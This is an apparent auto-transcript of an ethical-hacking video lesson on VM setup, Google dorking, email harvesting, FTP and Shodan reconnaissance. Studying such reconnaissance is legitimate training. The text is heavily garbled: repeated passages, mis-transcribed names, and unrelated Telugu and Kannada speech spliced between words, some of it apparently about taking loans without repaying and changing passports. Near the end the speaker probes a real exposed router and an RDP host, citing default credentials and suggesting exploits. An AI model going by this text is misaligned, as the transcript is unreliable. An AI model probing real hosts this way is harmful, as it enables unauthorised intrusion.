Hello guys, welcome back to a Pentesters Club. Today we're going to get a new course of Certified Ethical Hacking version 2 or 13, including with an AI. So, so in this Certified Ethical Hacking course, what do you buy a Pentester Club and organizations and authorized by a PCPL? Alex, this course is designed for individuals who aspire to master and fundamental for advanced concept of ethical hacking while learning how to counteract with a cyber threat and efficiency. So, the ever evolving a world of cybersecurity and demand a skilled professionals who can protect a system and network from a malicious attack. This course provides a structured approach to an ethical hacking, covering a wide range of topics and essential for a defending against a cyber criminals. Whether you are a beginner and taking a first step into an ethical hacking or a professional looking for expand your skill set, this course has been meticulously curious to ensure the comprehensive for learning. Each chapter divided into a techniques, tools, and methodologies used by ethical hackers to identify and mitigate vulnerabilities. This course balances uh, theoretical knowledge with the practical applications to ensure a well-rounded learning experience. So we strongly recommend using this course alongside accompanying a book, which serves a reference and a detailed guide of each module. And book includes a step-by-step instructions and diagrams and the case studies and enhance for your understanding. So the book also will be provided to you. So uh, now, before proceeding, please ensure you need to be following this one. A basic understanding of network and operating system. If you studied about uh, computer science engineering, this you are well known about this. A dedicated lab environment, a practice for hands-on experience. This will I will show you how to you can get it. A mindset, a focus on learning with an ethical responsibilities. Always keep it on positive thinking mode. Your journey will become a certified ethical hacker starts from here. Like, what are the course content we going to look here? Introduction to ethical hacking and countermeasures. So first we would like to look how it will be go, like what is introductions and everything, and later footprinting and reconnaissance, scanning, enumeration, system hacking, malware threats, sniffing, social engineering, Daniel of service, session hijacking, evading IDs and firewalls and honeypots, hacking a web service, hacking a web applications, and escalation, and hacking a wireless network, and hacking a mobile platforms, IoT and OT hacking, and cloud computing and cryptography. So, where in this, we are going to learn as one thing as by using with our tools, and another thing is we are going to utilize as a open AI. So we are going to utilize it as open AI platform. This one also, it's also a good for doing for ethical hacking and everything. So to get this uh, API key, then we are going to do other things. That's the basic. Now, that's it. Now, before we are going to as a first topic, we would like to know to get as something as what we would like to get a we would like to get a so we have OpenAI. So what are the basic operating systems we require? So the basic operating system is required minimum like 8 to 16 GB RAM. Any type of PCs, like if you use like your home PC, that's great. If you have laptop, that's great. If you are using Mac, that's well and good. Any one of the operating system, that's great. So, first of all, we would like to get a first thing is, so first we would like to get a of operating systems is like poly.org. So from here, you just need to get a download a poly.org. So for me, I would like to choose only the ISO images. So let me. I would like to get complete offline systems installation. I would like to look this. Yes, let me. I would like to download. So this I already have. So you need to download this one. So if you are using as Mac OS, so just to download the VirtualBox. So this is for a Mac OS. So this is for VirtualBox. Then also you can also download an extension box. Here, download VirtualBox binary for platform, and there you can also get this. So based on your operating system, if you are Windows, you can use. So this VirtualBox is fully compatible with Mac OS. That's available. If you are using Mac OS, you can utilize this one. I have Windows, I would like to take this one. And if you are using Windows or Mac, you just need to download this VirtualBox extension pack. It is mandatory without giving any type of errors, otherwise XYZ things will do. That's it here. Now, for a Windows, you need to specifically use as a VMware. So, VMware workstation. So you'd like to get this VMware Workstation Pro. So I already installed a VMware Workstation Pro. So where I have everything. Now I would like to click and go here. This. So
నేను ఎవరో తెలుసా 20 లక్షలు 30 మంది కేసు దీప్ అనుదీప్ చెప్పండి నేను ఎవరో 20 కేసులు 30 మంది కేసు మీకు ఎలా తెలుసా ఎట్లా ప్రస్తుతం చెప్తున్నా అసలు మాట్లాడి చేద్దాం అనుకున్నారా మీరు అలా వెళ్ళిన వాళ్ళిద్దరు మళ్ళీ తిరిగి రాలేదన్న తమ్ముళ్ళు పెళ్లిపీటలు వెళ్ళొస్తున్న అమ్మాయి 2 రోజులు పరిచయమైన ఒక అబ్బాయితో లేచిపోయిందంటే వాళ్ళు ఎంత గాఢంగా ప్రేమించుకుని ఉంటారు దాని వెనుక అంత బలమైన కారణం ఉంటుంది చెప్పు ఇంకేమన్నా టైం చూసినావు చెప్పు
So in this part, just open the 8GB because I have myself a 16GB RAM. That's why. So I just click on OK. Now let me. I just power off. That's it. I just click on escape. So for this, you also apply
మీ ప్రేమ మీద నమ్మకం కలగాలంటే
a virtual or a Windows Windows 7, Windows 12, Windows 2022, MySQL Server, everything. So for that also, you just need to build everything from here. So that we would like to show you here for everything.
ఈ అమ్మాయి నా గర్ల్ ఫ్రెండ్ రా పేరు నీకే తెలుసా
So let me would like to install this one first. Then later we would like to try.
నేను నిజంగా దొంగతనం చేసుకుంటానా చెప్పు
సారీ అమ్మాయి దొంగతనం చేస్తాను దొంగను పట్టుకుని సపోర్ట్ చేస్తున్నాను
ఇంకోసారి దొంగ దొంగ అన్నారంటే అందరినీ చంపి పారేస్తాం అసలు నా దగ్గరికి ఈ నెక్లెస్ ఎలా వచ్చిందో తెలుసా లడ్డు
So
ఏంటి
this is to
నెక్లెస్
నెక్లెస్ in one of the document. Then let's just what else apart I just put or password. So you can utilize as a stronger password. Otherwise, there will be a default password will come like Kali Kali. That's it. So you can also utilize that one. That's no issue. So now we are setting our ethical hacking environment. Now we can see here. So you just try finish. You just try yes. So let it install this one. Then later we would like to go further.
లేదు మామా మాకెందుకు చెప్పలేదు మామా ఫీల్ అవుతారేమని చెప్పలేదురా ఫీల్ ఏంద్రా మీరు అమ్మాయి కోసం వచ్చి ఐటమ్ ఫండ్ రిటర్న్ చేస్తారు నెక్లెస్ దొరికినాక మీరు మీరు కొట్టుకుంటారు మనం కలిసి ఎన్నో డీల్స్ చేసాం కానీ ప్రతిసారి
This installation will take a little bit time. So we would like to install this one first here.
Okay, bye. చంపేసిన నాకు కడితేరదు బాబాయ్ అందుకే వదిలేశాను
So here is because continue take a long lengthy time process. Then in meantime I can go for a record for another video. So just quit now here. Hello guys, so back to Metasploit. Today we're going to get a new course on certified ethical hacking version 2.30 including an AI. So in a certified ethical hacking, what do why do vendors require? And this course is designed individually trying to master and monitor for advanced concept of ethical theory, how to contract with the cyber antigens. The ever-evolving world of cybersecurity and dynamic skills solutions, we can protect a strong network from a malicious attack. This course provides a structured approach to an ethical hack, covering a range of topics and essential for a defending against cybercrime. Whether you are a beginner taking a first step into an ethical hacking, a professional looking for expand your skill set, this course has been meticulously curious to enter the comprehensive for learning. Each chapter divided into techniques and methodologies used by ethical hackers to identify and mitigate vulnerabilities. This course balances theory knowledge with a practical application, show a well rounded learning experience. So we strongly using this course alongside a accompanying a book with a reference and a guide of each
ఇది
and
అంతా
book includes
వెరిఫై
step-by-step
చేస్తారా
instructions and diagrams and case
ఏఐఎం
studies and plans for its understanding. So also will be provided to you. So
సరే బ్రో నేను కార్డ్స్ కూడా
now
అరేంజ్ చేసినా
before proceeding, please ensure you need to be following this one. A basic understanding of network and operating system. If you studied about computer science engineering, this is not well known about this. Dedicated environment, a practice for hands-on experience. I will show you how to you can get it. A mindset, a focus on learning with ethical responsibilities. Always not positive thinking.
ఇది తీసుకున్నాం
Your journey to become a certified ethical hacker is from here. Like, what are the course content we going to look here? Introduction to ethical hacking and countermeasures. So first we would like to look how it will be go. Like what is intrusions and
అంతే
everything.
వన్ పని
And
అంతే
later, footprinting and reconnaissance, scanning,
ఆడ
enumeration,
ఇంకో అకౌంట్
system
వస్తుంది
hacking,
దానికి అప్లై
malware threats,
అప్లై చేసి
sniffing, social engineering, denial of service,
దాంట్లో
session
ఈ
hijacking,
పాస్ కి
IDs and
అకౌంట్
firewalls and
వస్తుంది
honeypots, hacking web servers, hacking evasions,
ఈ
and
పాస్
SQL injection,
అకౌంట్ వస్తుంది
and hacking a wireless network and mobile platforms,
దాంట్లో అకౌంట్
IoT and
ఓపెన్
OT hacking,
ఇన్స్టెంట్
and cloud
సెటిల్మెంట్
computing and
సెటిల్మెంట్ టైం
cryptography.
టైం
This
యూకే
is
10
doing
పిఎం
as one thing as
అలా
I
ఉంటుంది
using with our and another thing
ఇన్స్టెంట్
is
సెటిల్మెంట్
we
కి
are going to utilize as
2.9% ఎంతో చార్జ్
so we are
చేస్తారు
going to utilizing with as OpenAI platform.
అది చూడండి
This one also it's also a good
అది దాంట్లో మీ
for
సెట్టింగ్స్
doing for ethical hacking and everything. So we're going to get this API key, then we are going to do a further things. That's great. Now that's it. Now before we are going to as a first topic, we would like to know
ఇంకా
to
వేరేదైతే చాలా
get
హెడ్ఏక్
as something
ఇది హెడ్ఏక్
as
చాలా పోయింది
what we would like to get a we would like to get a
వేరేదైతే మంత్లీ
so we have OpenAI. So what are the basic operating systems we require? So the basic operating
దాని
system is
తర్వాత
required
ప్రతిసారి వాడు
minimum like
లింక్
8 to 16 GB RAM, any type of PCs. Like if you use like your home PC, that's great. If you have
మీరు
laptop,
అస్సలు
that's great.
కాల్
If you are using Mac, that's well and good. Any one of the operating system, that's good.
ఇది కంపెనీ యుఎస్ లో ఉంది వీళ్ళు ఏం పని చేస్తారు వీళ్ళు అస్సలకి దీన్ని నోటీస్ కూడా చేసుకో ఒక 50,000 ఇంకా 100,000 చేసేసి ఓవర్ డ్రాఫ్ట్ లో
So,
అప్లై చేసి
first of all, we would like to get a first. So first, we would like to get a
అంతే
operating systems is like poly.org.
10 days లో చేయొచ్చు
So from here, you just need to get a download a poly.org. So for me, I would like
యూఎస్
to
మిషన్
choose only the ISO images.
5,000
So let me. I would like to get complete
కార్డు కూడా
offline custom
తీసుకోవాలంటే
installation. I would like to look this.
కార్డు
Uh, yes, let me. I would like to download.
యూఎస్ లో తీసుకుంటాడు 5,000
So this I already
5,000
have.
కన్నా ఎక్కువ
So
తీసుకుంటాడు
you need to download this one. So if you are using
5,000 pounds
as
and
a
10,000
Mac OS,
rupees.
so you just need to download the virtual box. So this is for
5
a
లక్షలు ఆ యూఎస్
Mac
ఎలా
OS.
స్వైప్
So this is for virtual box. Then also you can also download an extension box. Here download a virtual box binary for
సరే
platform.
రేపు
And there
రేపు వచ్చినప్పుడు
you
ఒక
can
6 అవర్స్
also
8
get
అవర్స్ ఛార్జింగ్
there
పెట్టమంటాడు
this.
ఆ 8 అవర్స్ కంటిన్యూస్ ఛార్జింగ్ పెట్టేసి దాన్ని
So
device ని పేరు
based on your operating system, if you are Windows, you can use. So this virtual box is only compatible with Mac OS. That's well and good. If you are using Mac OS, you can utilize this one. I have Windows. I would like to take this one. And if you are using Windows or Mac, you just need to download this VirtualBox extension pack. Is mandatory. without giving any type of errors or
వాళ్ళు
otherwise
వచ్చి నీ
XYZ
దగ్గరకు
things to
వచ్చి
you.
ఇదంతా
That's
చేసే
it
అంత
here.
సీన్ లేదు
Now,
అక్కడ.
for a Windows, you need to specifically use as a VMware.
సరిపోదు.
VMware. VMware. So, VMware Workstation Pro.
అది లైక్ ఒక హాఫ్ అన్ అవర్ అంతే.
You'd like to get this VMware Workstation Pro. So I already
ఏం
installed
పర్వాలేదా
a VMware
అంటే
Workstation
చెప్పావు
Pro.
కదా,
So where I have here everything. Now
ఒక 100,000
I
చేసేసి
would
ఓవర్
like
డ్రాఫ్ట్
to
లోన్
click on go
తీసుకొని
here.
రిటర్న్ రాకపోవాలి.
I would like to launch this. So this is nothing else. So I just now I would like to. So the VMware applications will be stored everything from here. So I just
సరే ఇంకొకటి అతనికి క్లియర్గా
close
చెప్పండి,
this
ఓకేనా?
everything.
తర్వాత మళ్ళీ
Now
యూకేకి వస్తే మళ్ళీ దాన్ని
you need to
దానిపైన
know how to
ఎక్స్ట్రా ట్యాక్స్
install
కూడా
the
వేస్తాను
Polylinux.
వీసాలో.
So in this part, just
మళ్ళీ
open
ఇతను
the
మనం ఓవర్ డ్రాఫ్ట్
click on
లోన్
new.
తీసుకుంటే అతని
So
వీసా పైన
you need to
బడ్జెట్
install
పడుతుంది.
manually this one. Then you just write here as typically recommended.
మనము ఓవర్ డ్రాఫ్ట్
Just
లోన్
write
తీసుకున్న
yes,
తర్వాత
like here as
జంప్
Kali.
జంప్
You
అవుతుంది
just write
కదా
next.
ఇంకా.
You just give at least a 50. You just finish this.
సేమ్ లైక్
Then
విజయ్ మాల్యా కేసు మాత్రం వేస్తారు.
once this is done, now you just click on
వాళ్ళు
this
రారు.
from NAT to just click on bridge adapter. Now click on auto detect. So use an ISO image. Now you just need to select where you have your VMware.
వాళ్ళు
So I
లైక్
just
సేమ్ లైక్ కొద్ది ప్రాసెస్ ఉంటుంది.
get
ఇంత
my
లోపల
ISO
కట్టాలి,
files
లోపల
from
కట్టాలి.
here.
మీరు టేక్ లైక్
So
అంటే
where is this?
మళ్ళీ
Is my Kalivanex. So I just
ఇండియా
click
దగ్గర
on OK. That's great. So if you want to increase the memory,
పాస్పోర్ట్
you can
చేంజ్
increase up
చేసేసుకోండి
to
అంతే.
8 GB because
అడ్రస్ కూడా ఉండదు.
I have mine is a 16 GB RAM. That's why.
ఫర్
So
సేఫ్టీ
I
పర్పస్.
just click on OK. Now I just power up on. That's it. Now I just click on yes
సో
here.
నాకు 10th వరకు నాకు నో రిసోర్స్. నాకు మనీ కావాలి, ఆల్మోస్ట్ 1 lakh రూపీస్ కావాలి. నేను అరేంజ్ చేస్తున్నాను. మన దగ్గర ఫ్లైట్
So
టికెట్స్ లేవంట.
for this, you also require to build a virtual environment for a Windows 11, Windows 12,
మీకంటూ లెక్క
Windows 2022, MySQL Server, everything. So for that also, you just need to build everything from here. So that we would like to show you here everything.
సరే బాబు, చేస్తాం. ఓకేనా? చేస్తాము, నేను కాల్ చేస్తాను.
So we would like to install this one first. Then later we would like to
కార్డ్స్ రెడీ
continue
ఉంటాం.
from here.
రేపు చేసే కాదు, ఎల్లుండి చేస్తాం. ఆటోమేటిక్గా అవుతుంది.
So you just need to enter your
సరే
any one of the targeted name. Then let me I just press this. So what else I required I just press here. Now you just enter your password. So you can utilize
మీకు
as a
కావాలనుకుంటే నాకు
stronger
సెండ్
password.
చేయండి.
Otherwise
నాకు సెండ్
there will be a
చేసినప్పుడు
default password will come like
0.5%
Kali.
0.
That's it. So you can also utilize that one. That's no issue. So now we are setting our ethical hacking environment. Now we can see here.
అక్కడ అకౌంట్, నీ అకౌంట్ ఇంకా బైనాన్స్లో ఏదో ఓపెన్ చేసేసి పర్ఫెక్ట్గా కొంటున్నట్టు కొని ఇచ్చు.
So you just write here finish. You just write yes.
సరే
So let it install this one, then later we would like to go with the payload.
రాకెట్ ఇస్తే ఆడే చేస్తాడు.
హలో చెప్పు. అదే నువ్వు నాకు ఏదో ఒకటి కన్ఫర్మేషన్ ఇస్తే నేను నీకు సెటిల్మెంట్ చేస్తాను.
So now
అదే అంతా రెడీ ఉంటావా?
this installation will may take a little bit time. So we would like to install this one first here.
నువ్వు వాళ్ళకి అడగవు సార్, ఎప్పుడు ఫోన్ చేస్తారు వాళ్ళు నీకు?
అంటే వాడు తెలియని అరేండే కదరా, దీనికి అయిపోతాను బిజీ ఉంటాను 2 దినాల్లోనే.
ఏంటి 4 రోజులా?
2-3 రోజులనే.
So here you just click on continue. So this may take a long lengthy time process. Then in meantime I can go for a record for another video. Then later you would like to look this one. So I just click now here. So guys, now we are going to discussing about footprinting and reconnaissance. So what is footprinting? Footprinting is the process of collecting as much as information as possible about the target system, network or organization. It is the first step in the hacking process and it is essential for a planning an attack or penetration test.
నువ్వు వాళ్ళని అడుగు.
Now, what is a
రెడీ
reconnaissance?
ಮಾಡ್ಕೊಂಡ್ರೆ
So,
ನಾನು
reconnaissance is the
like 1 or 2 hours
broad concept that involves for gathering intelligence to identify potential vulnerabilities and entry point. It includes both passive and active techniques. Now you can see here
ನನಗೆ
we already discussed about passive footprinting and active footprinting.
ಏನು ಬೇಕೋ ಅಲ್ಲಿಂದ ಪ್ರಿಪೇರ್ ಮಾಡು.
Key goals for reconnaissance: identifying a domain name, IP addresses, and everything. Gather employee information such as email address, job titles, etc. things. Map the network infrastructure, everything. Discover technologies as services in the use. Uncover vulnerabilities and misconfigurations. We have seen this. So tools. We are going to doing a step by step each and every tool in one section. We can understand and learn in depth of every tool, like search engines like Google, Bing, Google Docs, everything. Who is lookup? We would like to look that one, everything. Social media platforms, that also we can look here. I showed on everything. Like this one, a passive reconnaissance tool. This for active reconnaissance tool. Nmap, Traceroute, Netcraft, multi-hole reconnaissance. And techniques for effective reconnaissance like a Google docking. So this we would like to do this our first target. DNS enumeration, like we would like to use a tick and a lookup. Piracy, that's great. Then email harvesting. Collect email address or phishing campaigns or further reconnaissance tool like the harvester, the hunter.io. We would like to look this hunter.io. Hunter.io. Let me just look here. In this, you just need to create an account. Then you can get entire of your targeted emails. So you just need to look the plans. So where you can see here, where this is for a free, you can get it here. So you just take it as free. You just don't require anything else. Discover can yearly searches. So here you can see 25 searches only per month. That's it. So any one of the targeted domain, you can look here, you can get any emails. Yearly verification of additional verifications is only for 50. So this is for only month.
వాళ్ళని ప్రిపేర్
And
చేసుకోమని ఇంకా ఇక్కడికి వచ్చిన
domain
తర్వాత
search.
ఇంకా 4 రోజులు ఉంటాను
So in this, you have a domain search. If you take it as XYZ, this as premium, that is good. So even if you take it as a starter one, that's great. So if you are doing something like only the black hat hackers they can take, not for ethical hackers. Ethical hackers they can use like some. This is a best tool for finding any type of emails. Here we would like to get as extension is available here. You can get into these extensions and you can grab any type of targeted industries, XYZ things, everything you can find here, all information. So this and all, like it will come with Office 365 and Microsoft and everything which was they hosted here. That's it. Now that's it here. So this is a paid plan hunter.io, so we don't require this. Now Webalizer, we would like to utilize that, and HTTP track, that also we can utilize. A worksuit we can utilize here. Now that's it. So next we are going to do a first tutorial of a fully practical based of this one. That's it. So guys, now we are going to for an practical. Gather information using advanced Google hacking techniques. So advanced Google hacking techniques is also known as a Google docking. Involves using a specific search queries to locate a sensitive or hidden information on the web. These techniques leverages a Google powerful search engine to find the data that may not be easily accessible through a normal browsing. This can be a valuable tool for penetration testers and ethical hackers to uncover the vulnerabilities, misconfiguration, and expose the sensitive information. Now, we would like to
ఆర్మీలో వద్దాను నేను వస్తానులే నైట్కి
let we just open the Firefox. Now let me just type here as a google.com. In this google.com,
నువ్వు రేపు
now
ఎన్ని గంటలకు
we
కాల్
would
చేస్తావు
like to utilize a so first we just came to google.com. Now I just type here as in title login site.
నేను గోల్డ్ వాళ్ళ దగ్గర ఎక్కించుకుంటాను
I just type here as which one I would like to
ఇప్పుడు
type
కావాల్సిన ఇప్పుడు
as
ఎక్కించుకుంటాను ఇప్పుడు వస్తావు నువ్వు
I just type here as bmw.com. So
డైరెక్ట్ ఫ్లైట్ ఏమీ లేవు ఎయిర్
so where I have got it here. Now just I open in the new tab. So where you can enter here username as test, password as test, invalid username or password. So where is this
కన్ఫర్మేషన్ తీసుకో
web authentication? Now let we would like to look here.
నువ్వు ఒక 10,000-20,000 ఎవరి దగ్గర తీసుకో
So
నా దగ్గర
unable to log in here. Where all rights a motor cards limited. So we can't able to log in here. Come back here. So we would like to utilize all here in this Google search bar. So I would like to find a one of the I would like to find as a Bentley. we just type here as a file type PDF car. Here I have got it here as a Bentley PDF as car. Now we would like to analyze this one. Now I can see here new Continental GT, the Continental GT speed. So we can observe everything about this, a targeted information about a Bentley. So this is super luxury car where we can see here a good design, seeing the light. So V8 hybrid powertrain. So combining all new turbocharged 4-liter V8 petrol engine. This is an petrol engine. You can see here. So it will drag 0 to 100 kilometers per hour in 3.2 seconds. Top speed is 208 kilometers per hour. Power 771. Torque is 1000. So it's a high performance vehicle. So where we can get it all the information about this, a latest model. Technologies where so everything you can see here. So this is like wireless dish design with the which of this it's not represented anything. So where you can get it here which type of colors you want, you can get it all these things. Wheel type, you can look which type of wheel. So everything will be designed here, interior and exterior, XYZ things. It's all handmade. That's it. So in your target, which one you require, you can do that one. Now let me come back here. Now I want to try apart from this, so I just type here as a catching in this thing. I just type here as www.abentley.com. Oh, sorry, BentleyMotors.com. So I just need to copy this. So I would like to search this one. So where I have got this Bentley Motors. Now we can look here. Let me press this. So here we not get anything else. A Bentley Motors. It's okay. Now if you want to find all URLs about this targeted things, and I just type as all in URL. Now I just type here as a Bentley Motors. You can look here, Bentley Motors take it hit. So all the quizzes corresponded, all the important things is given here. Now let me just go back here. Now we just type as in URL. So in URL, the operate is like this is officially a Bentley.com. So just copy, come back. Let me just Bentley Motors. You can look here only the targeted thing. So which was given everything clear. Now I just write or in title. Now you just need to present your a query. I just write here as a detect a malware.
వాళ్ళకి ఫోన్ చేసేసి క్లారిటీగా కనుక్కో.
Let's see. So this is not work. I type here as a in anchor. So this operation runs the results page like with an antivirus. So now I just type here as in anchor. The banks. So you can see it was restricting us. So you can see foreign exchange, Bank of England, European Central Bank, bank, foreign exchange cash with Sun Bank, electronic Sun Bank. We can see this and Taiwan Bank. That's it. Now let's come back here. Now just type all in anchor. In this, you just specify the restriction. Like I just need to put as AWS cloud. So
నీకు ఒకటే చెప్పేది ఎక్కువ
wait, we would like to look from here. What else we can get it from here?
నువ్వు ఇక్కడికి వస్తుంటే
So because here internet is drop out.
మీ ఇంట్లో తెలిసింది అనుకో మీ హరీష్ వాళ్ళకి వీళ్ళకి ఓకేనా క్యాంపోటే వెళ్ళింటాడు ఏం
Yes.
చేయదు అంటారు
So where I have got it here AWS, which was get enter of results. So it is a popular thing. Now I just type here as I would like to type as we would like to go with background. We can look here background, X platform, YouTube, everything. So now once here, even if I type here as a PCPX, where you can get it all the informations about where I can make a videos. So where you can look here all the information is coming back here. Now that's it. Now we would like to go back here. Now we would like to try as a link. So a link is like you would like to present any one of the target. Link is I would like to present the link. Find the page point any one of the targeted. So if you mention as WordPress.com, you can look here everything about targeted WordPress, which will be present automatically here. That's it. Now we would like to go back here. Now we just type here as related. In the related place, we just enter a query like a targeted domain. Like if you go for a TerraBox, where we will give storage. Where you can look here TerraBox cloud storage, then best software 1 TB a free cloud storage offered by TerraBox. Is definitely not, but it was a slow. That's good, but nobody is going to be offered as a free for a 1 terabyte storing your data. Now we would like to look here related. Now let we just go back here. Now info. So you need to get any one of the targeted information about a targeted event. Like we would like to put here as I would like to put as info.
వేరే మీరు నేను ట్రాన్స్ఫర్ చేస్తారంటే
I
చెప్పి
would
నేను
like to
తీసుకుంటాను.
put here
ఇండియాలో కావాల్సింటే ఇస్తాను.
elephant islands. You can look here. You get
నా
here
దగ్గర
islands
నో స్టాక్
about
ఉంటుంది.
a full information.
ఆల్ కన్సీస్ తీసుకుంటాను. యూఎస్లో
So this is map. Elephant and explore waters.
ఓకేనా? ఇండియా
So you can see what this in Andaman Nicobar. It's well and good. Now, so even you can enter any one of the target domain like a
ఇండియన్
.com. It also give a result about a Google, a personal info,
ఇండియా ల్యాండ్ తీసుకోండి.
sign into user accounts, XYZ things. So you can utilize in this format. Now we would like to come back
పెద్ద
here.
అకౌంట్స్ ఉన్నాయి. హెచ్ఎస్బిఎస్సి, యూబిఎస్,
Now you can utilize a location.
రిసర్చ్ బ్యాంక్,
This operator finds out a specific site
$100 million
where which was given. So I just enter here Saturn's Iceland.
అస్సలు కుదరదు. ఒక్క పైసా కూడా ఇచ్చేది కాదు.
Now you can look here. Statens is located in Switzerland. If you give a exact thing, Kazakhstan, Kyrgyzstan, Tajikistan, Turkmenistan, Uzbekistan is the reason is located. Statens Iceland, I just specify as a New York. Now it will be present as a New York one. Let's see here.
మీ ఏరియాలోనే ఉన్నారు కదా. మీరు ఎక్కడ ఉన్నారు ఇప్పుడు? మీరు అక్కడ షిఫ్ట్ అయిన
So here I might get.
అంతా చీప్ ట్రిక్స్ ఉంటుంది. సింపుల్ సైట్. ఉంటాను.
So using all these stats, so you can utilize your own way. So how you like it in anchor, all anchor, related info, locations, etc. things. That's it. So guys, now we are going to discussing about second one, gather information from video search engines. So what is a video search engines? Video search engines are internet-based search engines that crawl a web looking for a video content. These search engines either like provide a functionalities or uploading or posting the video content on their own web servers, or they can pass a video content which is posted externally. So here we would like to look here, just open. Now let's come back here. Now just type here as walk here as a youtube.com. So in this youtube.com, now we would like to look here, search anything else. So I want to search a basically Alexia. Now you like to take this one. Now I just click on a share. Just copy the URL. That's it. Now we would like to open a new tab. So in the new tab, we just type here as mat.io. So here a metadata for a YouTube. So we would like to look here to get a YouTube for a metadata. Now what else you have copied that and you just here. That's it. So you don't need to worry before it's even if you put this one and this one doesn't matter. So you just click on submit. Now let's wait for 3 seconds. Now you can scroll down here. Now you can look here a published at 2024 12 16 1431. Okay, a channel identity. Then a title is Token Access Control Explain, the #1 web application of risk. This is the description. Everything we get it here, all over here. The description. Now let's come back here.
Jeez.
Now, thumbnail. Thumbnail of the URL. If you want to get a thumbnail of the URL, so you just click on this open link in the new URL. So can't able to make it as a little bit big, this one here. So this is one thing. So you can find the tags, whatever the tags which was used here. And this is the video identity. This is the statistic. View count likes 3. Favorite count 0. Comment count 0. There is nothing else. Now, where a geolocation is presented, it was in the New York latitude and longitude. So even if you take this a latitude and longitude and paste it in the Google map location, that will be present automatically the exact live location of where the video is made. Okay. And status, upload status is processed, privacy status is public. So the video is in public. Okay, everyone can watch. Licensed by YouTube. The video is embedded, it is true. That's it here. Now we can look here. So where you can look here, thumbnails. So even you can look here, click on reverse image search. Now this image will find a related of things. Official Kali Linux tool to check a broken access control. Entire of this one, where it will find a related of that one. That's it here. So this is how you can search the video content by online. So this concludes the demonstration of gathering information for advanced video search and reverse image search using YouTube search engine and YouTube metadata. Also, you can utilize as like Yahoo search engine, otherwise videoreverser.com. I can show you here. Video reverser. So online video reverser. You just also utilize this one. Enter the targeted URL. We have already our targeted URL. We just click on start. We could not process your file that has a wrong document type. Okay, so it was a wrong document type. We cannot able to process this one. Okay, never mind. So we don't have any type of videos to upload here and look it out. So we don't want to give anything else. So even you can look like image search with Yahoo and everything. So you can also look as images dot search dot yahoo.com. You can also look from here. You can get a valuable thing. So you can search here search where it was described here. This is thumbnail. So which is the famous one will be presented here, the first one. That's it here. Yes. So even you can search by a Google, that's it. Will be displayed automatically. So guys, now we are going to discussing about a gather information from FTP search engines. So what is FTP? FTP defines as file transport protocol. So FTP search engines allows ethical hacker researchers to search or quickly access FTP servers and files they host. The search engines index files and directories on FTP server that are either intentionally or unintentionally left open to public access. Using FTP search engines is valuable technique during the process of ethical hacking to identify sensitive files or miscovered servers. So what are FTP search engines? FTP search engines are specialized in discovering a file stored on FTP server. These engines index a publicly accessible FTP servers that do not require authentications. Like, why use FTP search engines? To look at a public resource like a software, documents, or XYZ things. And to identify a misconfigured FTP server that exposed a sensitive data. To perform a reconnaissance of the target organization. To identify publicly available file or resources.
In my iPhone, what is this one? So I'm getting.
Now, We would like to search here. Let's come back here. Now let me just push this. Now we would like to come back here. Now we try search is.net is what now you can change what is right here. After that is something like words with what are words. So with words, just try Azure. Now let me. I just click on search. Now I can where I have got this ATN file. Where you can get this enter the file and you can look here. So there is a line Azure mirrors.com everything we can here. So we would like to discuss a popular like data.com. So we would like to utilize this one NAD.com. Still competitors customers list. These are our paid ones. So if you want to use a paid one, so you can utilize this one. Browse take on this. Search for code, try a JavaScript, HTML cookies, pixels, and HTTP errors. Network scans, runners and indexes millions of website source code. Find a website that use a code. So you can also utilize everything from here. So it just like work like Vaporizer, same as this. So they are often every extension of this one. So you can also utilize this one. Then we can use a search code in this. You can search a 75 billion lines of code from 40 million projects. You can also look here like virtual IT labs. We can search. We can get etc puppet plus http config puppet dashboard.config. So through etc php step. So there we getting a information. So here a query. So this was a linux.kit where we can get here a query lab with it was written in C. Everything. So we get to understand everything here. Also, you can use a payment business. Yes. Click here, payment panel Mac or .java. So there you can get entire of the source code. Now we can go to look here. Another one is a public www.com. So this can help for such open source of file data. So you just need to register this. You can get entire of these things. Like you just try as you can try here as a Linux. Otherwise, you just try here as AWS SNMP. Then you just click on search. Now we can look here. I've got a website since 2686 pages in 0.21 seconds. So you can entirely take or you can convert this one even and you can track it in AWS. So a targeted IP address. So I just enter here a targeted IP address. Then we just write as there is like a config.p. Otherwise then you can end there after SNMP. So then you can find very easily here. Now we can look as another one here as a file mare. So filemare.com. So where we would like to here this is not available. So here a FileMare alternative for similar search. So they have changed fast response ratios loaded. FileMare.com. Yes. Which might be a contain some correct so this is not accessing for us. Okay, let me just leave it this one. Now that's it. And we also see as if you want to get anything else, so we just go to any Google. So from a Google Doc search for TP, in the FTP, like we would like to utilize something like I'd like to get as a BMW. Then I just type here as title. So I just put here as, so I would like to put here as voa.com. Then just FTP. Set. There you can here look here. This will be take everything, but you can look here, a Bank of America. This is a thread has been locked. If you have related to this, ask the question. A Texas events. Okay. B2B epic. So where the bankers can log in from here. That's it. Then you can also look here. A group. Here we can also look here. This is file transfer protocol. BYFTP.java. So you can cut to all the FTPs here. So let's cut the demonstration of information from episodes. So guys, we are going to discuss about gathering information in IoT such events. So IoT means Internet of Things. Such engines are powerful tools that help locate internet-connected devices such as cameras, switches, industry control system, IoT devices, ethical hosts, and researchers. Use these searching to identify devices that are publicly exposed and many have vulnerabilities or misconfiguration. These tools are instrumental in reconnaissance during the penetration test. Now, why are IoT search engines used? Like
countries
webcam, thermostat, SCAN systems, others, open service and protocols in use, inversions, and operating systems. So, first, we're going to discuss about a popular thing as the first one as a front. So we would like to discuss about this short one. So we like to come back here. So let's read this. Now we just type as a short.io. So the most widely used for IoT is it identifies the internet connected devices and provides a details such as open ports, banners, and vulnerabilities. Now I want to search like I would like to search I'd like to searching something like research resume document. I just type here as HAZ.com. So let me like to search just HAZ. Now you can look here everything about the firmware version is one, host name, which is available here, JC Plaza, vendor, microtik. So if you understand what is the option, you can copy this one. Now let's come back here. Microtik, router, default password. The default password for microtik depends on device and its configuration. And admin. So the username is only admin. The password is no password. Here, this is starting with this. Open the browser in the router IP address. In the bar, default IP address is equal. Now you can look here. Direct IP access is not allowed in the cloud pair. Here we have got with the one system with SSL certificate. Domains like we like to look here. Domains and records, everything records where I have got all the records. So it's okay. What is the domain? The data. Now where open is this is as a remote desktop protocol where it was available. The project manager is Tom Abstract. Username is administrator. Password it utilize and bypass the password, so it does not matter. So where we have identified here. So this is autonomous server, ISP, flexible Colorado Corporation, where you have got here Salt Lake City, United States. Windows build version 10.05. This. So even we can quite exploit this one also. We can look at tested exploit TV. Then you have got here cannot release escalation. So you know here you can utilize this one to get the targeted IP address 